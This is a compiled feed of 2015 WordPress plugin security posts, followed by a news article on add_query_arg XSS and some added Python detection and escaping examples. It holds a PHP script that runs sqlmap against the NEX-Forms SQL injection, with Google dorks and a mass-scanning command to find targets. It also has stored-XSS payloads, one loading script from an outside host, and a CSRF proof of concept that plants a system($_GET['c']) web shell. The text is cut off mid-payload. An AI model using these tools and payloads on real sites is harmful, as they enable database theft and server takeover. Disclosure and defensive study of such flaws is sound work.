
24 Apr 2015

WordPress NEX-Forms 3.0 SQL Injection inurlbr

  # AUTHOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered: http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
 
# VENDOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Vulnerability Description
The "submit_nex_form" AJAX handler (reached through wp-admin/admin-ajax.php) is vulnerable to SQL injection through its nex_forms_Id parameter.
 
# Tool Description
The script automates exploitation by invoking sqlmap against each target. With the sqlmap path, target and optional proxy filled in from $params, the command it runs is:
 
{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1
 
# GET VULN
SQL can be injected through the following GET parameter:
 
GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
 
# XPL inject DBMS: 'MySQL'
 
Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
- GOOGLE DORK
 
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builder
 
# COMMAND --help:
 
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
# EXPLOIT MASS USE SCANNER INURLBR
 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
 
# DOWNLOAD INURLBR
 
https://github.com/googleinurl/SCANNER-INURLBR
 
# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
 
EXPLOIT CODE:
 
<?php
 
/*
  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
 
-----------------------------------------------------------------------------
 
  # AUTHOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
 
  # Who Discovered: http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
-----------------------------------------------------------------------------
 
  # EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
  # VENDOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
  # Dork Google:  inurl:nex-forms-express-wp-form-builder
  # Dork Google:  index of nex-forms-express-wp-form-builder
  # GET VULN:     nex_forms_Id=(id)
  # $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
 
-----------------------------------------------------------------------------
 
  # DBMS: 'MySQL'
  # Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
-----------------------------------------------------------------------------
 
  # Info:         The "submit_nex_form" ajax function is vulnerable to SQL injection
  # POC:          http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
 
-----------------------------------------------------------------------------
 
  # --help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
-----------------------------------------------------------------------------
 
  # EXPLOIT MASS USE SCANNER INURLBR
  # COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
 
-----------------------------------------------------------------------------
  INFO: http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
 */
 
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
// Command that launches sqlmap. Adjust to your install, e.g. "python ../../sqlmap/sqlmap.py".
$folder_SqlMap = "sqlmap";
$op_ = getopt('f:t:p:', array('help::'));
echo "
\t\t\t\t  _____
\t\t\t\t (_____)    ____ _   _ _    _ _____  _                 ____        _ _
\t\t\t\t (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \       (_) |
\t\t\t\t  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___ _| |
\t\t\t\t   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __| | |
\t\t\t\t   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \ | |
\t\t\t\t  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_| \__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]: --help\033[0m\n\n";
$menu = "
\t\t\t\t    -t : SET TARGET.
\t\t\t\t    -f : SET FILE TARGETS.
\t\t\t\t    -p : SET PROXY
\t\t\t\t    Execute:
\t\t\t\t                  php wp3xplo1t.php -t target
\t\t\t\t                  php wp3xplo1t.php -f targets.txt
\t\t\t\t                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
 
// Read the options through isset() so a missing switch does not raise an undefined-index notice.
$opt_t = isset($op_['t']) ? $op_['t'] : NULL;
$opt_f = isset($op_['f']) ? $op_['f'] : NULL;
$opt_p = isset($op_['p']) ? $op_['p'] : NULL;
 
$params = array(
    // Prepend a scheme when the target was given as a bare host.
    'target' => not_isnull_empty($opt_t) ? (strstr($opt_t, 'http') ? $opt_t : "http://{$opt_t}") : NULL,
    'file'   => !not_isnull_empty($opt_t) && not_isnull_empty($opt_f) ? $opt_f : NULL,
    // Quote the proxy string so it cannot break out of the sqlmap command line.
    'proxy'  => not_isnull_empty($opt_p) ? "--proxy " . escapeshellarg($opt_p) : NULL,
    'folder' => $folder_SqlMap,
    'line'   => "\t\t\t\t--------------------------------------------------------------------------------------------------------"
);
 
if (not_isnull_empty($params['target']) && not_isnull_empty($params['file'])) {
    exit("\t\t\t\t[X] [ERROR] DEFINE TARGET OR FILE TARGET\n");
}
if (not_isnull_empty($params['target'])) {
    __exec($params);
    exit();
}
if (not_isnull_empty($params['file'])) {
    __listTarget($params);
    exit();
}
// Neither -t nor -f was given: show the usage and stop.
exit($menu);
 
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
 
function __plus() {
    ob_flush();
    flush();
}
 
function __listTarget($file) {
    // One target per line; blank lines and duplicates are dropped.
    $tgt_ = array_unique(array_filter(array_map('trim', explode("\n", file_get_contents($file['file'])))));
    echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n";
    foreach ($tgt_ as $url) {
        echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n";
        __plus();
        // Normalise the scheme the same way -t does.
        $file['target'] = strstr($url, 'http') ? $url : "http://{$url}";
        __exec($file);
        __plus();
    }
}
 
function __exec($params) {
    __plus();
    echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n";
    echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
    // escapeshellarg() single-quotes the URL, so a hostile line in targets.txt cannot inject shell commands.
    $url = escapeshellarg("{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1");
    $command = "{$params['folder']} -u {$url}"
             . " -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent"
             . " --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1";
    system($command, $dados);
    __plus();
    // No exit() here: the caller decides when to stop, so -f walks every target instead of only the first.
}


24 Apr 2015

WordPress NEX-Forms 3.0 SQL Injection SQLMAP

######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# Info:
 
 The "submit_nex_form" AJAX function is vulnerable to SQL injection
 
 "nex_forms_Id" var is not sanitized
 
# PoC Exploit:
 
 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
# Poc Video:
 
 http://youtu.be/04G08Cbrx1I
 
# PoC sqlmap:
 
 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################
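The sqlmap transcript above shows a time-based blind detection from the tool's side. The Python below is an added example, not code from either advisory or from sqlmap: it makes the same decision the tool makes, sending the clean request, the SLEEP(n) payload and a SLEEP(0) control several times each, comparing medians, and reporting an injection only when the delay appears with the sleeping payload and not with the control. The two `*_endpoint` functions are constructed stand-ins for a vulnerable and an intval()-patched submit_nex_form handler (they sleep locally instead of talking HTTP); `http_get_sender` shows how a real target would be wired in with urllib and is not run here.

```python
"""Time-based blind SQL injection check modelled on the NEX-Forms PoC.

The *_endpoint functions are constructed stand-ins for the plugin's
submit_nex_form handler (not the plugin's code): they react to the
nex_forms_Id expression roughly the way MySQL would, so the checker can
be exercised offline.
"""
import re
import statistics
import time
import urllib.parse
import urllib.request

SLEEP_RE = re.compile(r"SLEEP\((\d+(?:\.\d+)?)\)", re.I)


def vulnerable_endpoint(params):
    """Concatenates nex_forms_Id into the query: a SLEEP() in the predicate runs."""
    expr = params.get("nex_forms_Id", "")
    m = SLEEP_RE.search(expr)
    if m and re.match(r"^\d+\s+AND\s+", expr, re.I):
        time.sleep(float(m.group(1)))  # MySQL would block the query for this long
    return 200


def patched_endpoint(params):
    """Casts the id like intval(): everything after the leading digits is dropped."""
    m = re.match(r"\s*[+-]?\d+", params.get("nex_forms_Id", ""))
    _form_id = int(m.group()) if m else 0
    return 200


def http_get_sender(base_url):
    """Real transport: GET base_url/wp-admin/admin-ajax.php?<params>. Not run in the demo."""
    def send(params):
        url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php?" + urllib.parse.urlencode(params)
        with urllib.request.urlopen(url, timeout=60) as resp:
            return resp.status
    return send


def median_seconds(send, params, trials):
    """Median round-trip time over several trials; the median resists one slow outlier."""
    samples = []
    for _ in range(trials):
        t0 = time.perf_counter()
        send(params)
        samples.append(time.perf_counter() - t0)
    return statistics.median(samples)


def is_time_based_injectable(send, form_id="10", delay=0.2, trials=3):
    """True only if the SLEEP(delay) payload is slower than baseline AND the
    SLEEP(0) control is not, which rules out a merely slow or jittery server."""
    base = {"action": "submit_nex_form", "nex_forms_Id": form_id}
    payload = dict(base, nex_forms_Id=f"{form_id} AND (SELECT * FROM (SELECT(SLEEP({delay})))NdbE)")
    control = dict(base, nex_forms_Id=f"{form_id} AND (SELECT * FROM (SELECT(SLEEP(0)))NdbE)")

    t_base = median_seconds(send, base, trials)
    t_payload = median_seconds(send, payload, trials)
    t_control = median_seconds(send, control, trials)

    slowed = (t_payload - t_base) >= 0.8 * delay
    control_clean = (t_control - t_base) < 0.5 * delay
    return slowed and control_clean


if __name__ == "__main__":
    print("vulnerable stand-in:", is_time_based_injectable(vulnerable_endpoint))
    print("patched stand-in:   ", is_time_based_injectable(patched_endpoint))
```

Against a live host you would pass `http_get_sender("http://TARGET/wordpress")` as `send` and raise `delay` to something like 5 seconds, since network jitter on a real link is far larger than on the local stand-ins.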


24 Apr 2015

WordPress plugins susceptible to dangerous exploits

More than a dozen WordPress plugins have been updated to patch vulnerabilities that allow attackers to inject potentially dangerous commands into the browsers of people visiting trusted websites. Administrators responsible for WordPress sites should make sure the fixes are installed as soon as possible.

The cross-site scripting (XSS) vulnerabilities make it possible for hackers to concoct special address URLs that inject client-side code into vulnerable Web pages viewed by visitors. Exploits can steal highly sensitive authentication cookies, which give users access to their private accounts without having to enter a password. XSS attacks can also change the content inside a vulnerable Web page. Along with SQL injection exploits, XSS attacks are among the most common class of attacks carried out on the Internet.

In the past few days, more than a dozen WordPress plugins have been updated to purge XSS vulnerabilities. According to an advisory published by Web application security firm Sucuri, they are:

Jetpack
WordPress SEO
Google Analytics by Yoast
All In one SEO
Gravity Forms
Multiple Plugins from Easy Digital Downloads
UpdraftPlus
WP-E-Commerce
WPTouch
Download Monitor
Related Posts for WordPress
My Calendar
P3 Profiler
Give
Multiple iThemes products including Builder and Exchange
Broken-Link-Checker
Ninja Forms

The vulnerabilities are the result of developers misusing two widely used functions that modify or add query strings to URLs, add_query_arg() and remove_query_arg(). Many developers assumed the functions would "escape," or sanitize, user input so it is safe to use. They don't. For their output to be safe, it must be passed through functions such as esc_url() or esc_url_raw(). The WordPress developer team has published guidance on the correct usage.

The plugins listed above were updated as part of a coordinated response following a blog post from last week that brought the XSS attack hole to light. Sucuri and others then analyzed the top 300 or so plugins and notified developers of those plugins found to be vulnerable. WordPress admins who use any of them should ensure they have been updated in the past few days to patch the bug. It's likely that additional WordPress plugins remain vulnerable, so admins should scrutinize all plugins running on their site to make sure they aren't susceptible to the same types of attacks.

Source: http://arstechnica.com/security/2015/04/swarm-of-wordpress-plugins-susceptible-to-potentially-dangerous-exploits/
23 Apr 2015

WordPress Add Link to Facebook Stored Cross Site Scripting

Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin
 
Author: Rohit Kumar
 
Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/
 
Severity: Medium
 
Version Affected: 1.215 and probably earlier versions.
 
Version Tested: Version 1.215
 
Version Patched : 1.215
 
Description:
 
Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon
 
About Vulnerability
This plugin is vulnerable to stored cross-site scripting. The payload is stored when a user with Administrator privileges saves the "Add Link to Facebook" settings, and it executes whenever the settings page is viewed. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.
 
Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce:
After installing the plugin:
- Go to Settings -> All in One Facebook
- Input this payload in "App ID": "><script>alert(1)</script>
- Click on the Save button.
- After the page reloads you will see a pop-up box with 1 written on it.
- Reload the page again to make sure it's stored.
 
Change Log
https://wordpress.org/plugins/add-link-to-facebook/changelog/
 
Disclosure
09th March 2015


22 Apr 2015

WordPress WP Statistics 9.1.2 Cross Site Scripting

===========================================================
Stored XSS Vulnerability in WP Statistics  Wordpress Plugin 
===========================================================
 
 
Overview
========
 
* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Version Affected: 9.1.2 and probably earlier versions
* Version Tested : 9.1.2
* version patched: 9.1.3
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Check for online users every:
*  Coefficient per visitor:
 
 
About Vulnerability
-------------------
This plugin is vulnerable to stored cross-site scripting. The payload is stored when an administrator with access to the WP Statistics settings saves either of the parameters listed above, and it executes whenever the settings page is loaded. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.
 
Vulnerability Class
===================     
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
* Goto settings --> WP Statistics
* Put This payload in any above vulnerable parameter <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
* Click on the Save Changes you will see XSS in action 
* Reload the page or re navigate to page to make sure its stored ;)
 
Mitigation 
==========
Update to 9.1.3
 
Change Log
==========
https://wordpress.org/plugins/wp-statistics/changelog/
 
Disclosure 
==========
14-April-2015 reported to developer
15-April-2015 Fix by developer
15-April-2015 Public Disclosure
Credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
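The three XSS items above (the add_query_arg() wave, the Add Link to Facebook settings and the WP Statistics settings) differ in where the attacker's string enters, the request URI in the first case and a saved option in the other two, but not in the fix: escape for the HTML context at output time. The Python below is an added example and is not WordPress or plugin code. Its `add_query_arg` is a stand-in that reproduces only the property that matters, returning the merged request URI without escaping it as the real function does; `esc_attr` plays the role of esc_attr()/esc_url() with plain attribute escaping (the real esc_url() additionally checks the scheme and strips characters, which is not reproduced). The attacker inputs are constructed for the demo.

```python
"""Reflected XSS through an unescaped request URI and stored XSS through an
unescaped setting, each beside the escaped rendering.  Added example; the
helpers stand in for WordPress functions and are not their code.
"""
import html
from urllib.parse import parse_qsl, urlsplit, urlunsplit


def add_query_arg(request_uri, **new_args):
    """Stand-in for WordPress add_query_arg(): merges args into the current
    request URI and returns it UNESCAPED, which is the property that bit
    the plugins listed above."""
    parts = urlsplit(request_uri)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query.update({k: str(v) for k, v in new_args.items()})
    merged = "&".join(f"{k}={v}" for k, v in query.items())
    return urlunsplit((parts.scheme, parts.netloc, parts.path, merged, parts.fragment))


def esc_attr(value):
    """HTML attribute escaping: the job esc_attr()/esc_url() do at output time."""
    return html.escape(value, quote=True)


def pagination_link_vulnerable(request_uri, page):
    """href built from the current URI and written out raw."""
    return f'<a href="{add_query_arg(request_uri, paged=page)}">Next</a>'


def pagination_link_fixed(request_uri, page):
    """Same link, escaped for the attribute context before output."""
    return f'<a href="{esc_attr(add_query_arg(request_uri, paged=page))}">Next</a>'


def settings_field_vulnerable(stored_value):
    """Stored case: the saved App ID is echoed straight back into value=""."""
    return f'<input type="text" name="app_id" value="{stored_value}">'


def settings_field_fixed(stored_value):
    return f'<input type="text" name="app_id" value="{esc_attr(stored_value)}">'


def contains_live_script(markup):
    """Crude check used by the demo: a literal, unescaped <script> tag is present."""
    return "<script>" in markup.lower()


# Constructed attacker inputs (not taken from the advisories):
# the payload rides in the request PATH, so no plugin parameter is "bad";
# an admin only has to follow the crafted URL.
CRAFTED_URI = '/wp-admin/admin.php/"><script>alert(1)</script><a href="?page=plugin'
# a settings value of the kind the Add Link to Facebook / WP Statistics reports use
STORED_APP_ID = '"><script>alert(1)</script>'

if __name__ == "__main__":
    print(pagination_link_vulnerable(CRAFTED_URI, 2))
    print(pagination_link_fixed(CRAFTED_URI, 2))
    print(settings_field_vulnerable(STORED_APP_ID))
    print(settings_field_fixed(STORED_APP_ID))
```

Note that the stored cases are not fixed by escaping alone in WordPress: the setting should also be sanitized on save (sanitize_text_field() for a free-text option), so that the database never holds markup in the first place.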


22 Apr 2015

WordPress MiwoFTP 1.0.5 CSRF Command Execution

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery
remote code execution vulnerability. The application allows users
to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions like executing arbitrary PHP code by uploading
a malicious PHP script file, with administrative privileges, if a
logged-in user visits a malicious web site.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 
 
Advisory ID: ZSL-2015-5242
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5242.php
 
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
 
 
24.03.2015
 
--
 
 
CSRF-to-RCE PoC. The payload is disguised so that what the admin sees in the editor looks like legitimate file content.
Logic error: when the admin follows the malicious link, the plugin will:
 
1. Open an existing file for editing: action=edit&dir=/&item=wp-comments-post.php.
2. Create the file wp-comments.php in the WordPress root folder (the 'fname' value of the form).
3. The posted 'code' is an excerpt of wp-comments-post.php without the '<?php' opening tag (social engineering; HTML-entity encoded).
4. Further down in that code, the evil payload <?php system($_GET['c']); ?> is inserted.
5. The admin is presented with the editing interface for wp-comments.php, showing contents taken from wp-comments-post.php.
6. Whatever the admin clicks afterwards (Save, Reset or Close), the backdoor file wp-comments.php has already been created (CSRF).
7. The attacker executes code, e.g. http://localhost/wordpress/wp-comments.php?c=whoami
 
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=/&item=wp-comments-post.php&order=name&srt=yes" method="POST">
      <input type="hidden" name="dosave" value="yes" />
      <input type="hidden" name="code" value="&#x2f;&#x2a;&#x2a;&#x0a;&#x20;&#x2a;&#x20;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x73;&#x20;&#x43;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x6f;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x70;&#x72;&#x65;&#x76;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x64;&#x75;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x65;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x2e;&#x0a;&#x20;&#x2a;&#x0a;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x0a;&#x20;&#x2a;&#x2f;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x27;&#x50;&#x4f;&#x53;&#x54;&#x27;&#x20;&#x21;&#x3d;&#x20;&#x24;&#x5f;&#x53;&#x45;&#x52;&#x56;&#x45;&#x52;&#x5b;&#x27;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5f;&#x4d;&#x45;&#x54;&#x48;&#x4f;&#x44;&#x27;&#x5d;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x41;&#x6c;&#x6c;&#x6f;&#x77;&#x3a;&#x20;&#x50;&#x4f;&#x53;&#x54;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x48;&#x54;&#x54;&#x50;&#x2f;&#x31;&#x2e;&#x31;&#x20;&#x34;&#x30;&#x35;&#x20;&#x4d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x20;&#x4e;&#x6f;&#x74;&#x20;&#x41;&#x6c;&#x6c;&#x6f;&#x77;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;&#x3a;&#x20;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x65;&#x78;&#x69;&#x74;&#x3b;&#x0a;&#x7d;&#x0a;&#x0a;&#x2f;&#x2a;&#x2a;&#x20;&#x53;&#x65;&#x74;&#x73;&#x20;&#x75;&#x70;&#x20;&#x74;&#x68;&#x65;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x20;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x20;&#x2a;&#x2f;&#x0a;&#x72;&#x65;&#x71;&#x75;&#x69;&#x72;&#x65;&#x28;&#x20;&#x64;&#x69;&#x7
2;&#x6e;&#x61;&#x6d;&#x65;&#x28;&#x5f;&#x5f;&#x46;&#x49;&#x4c;&#x45;&#x5f;&#x5f;&#x29;&#x20;&#x2e;&#x20;&#x27;&#x2f;&#x77;&#x70;&#x2d;&#x6c;&#x6f;&#x61;&#x64;&#x2e;&#x70;&#x68;&#x70;&#x27;&#x20;&#x29;&#x3b;&#x0a;&#x0a;&#x6e;&#x6f;&#x63;&#x61;&#x63;&#x68;&#x65;&#x5f;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x73;&#x28;&#x29;&#x3b;&#x0a;&#x0a;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x3d;&#x20;&#x69;&#x73;&#x73;&#x65;&#x74;&#x28;&#x24;&#x5f;&#x50;&#x4f;&#x53;&#x54;&#x5b;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x27;&#x5d;&#x29;&#x20;&#x3f;&#x20;&#x28;&#x69;&#x6e;&#x74;&#x29;&#x20;&#x24;&#x5f;&#x50;&#x4f;&#x53;&#x54;&#x5b;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x27;&#x5d;&#x20;&#x3a;&#x20;&#x30;&#x3b;&#x0a;&#x0a;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x28;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#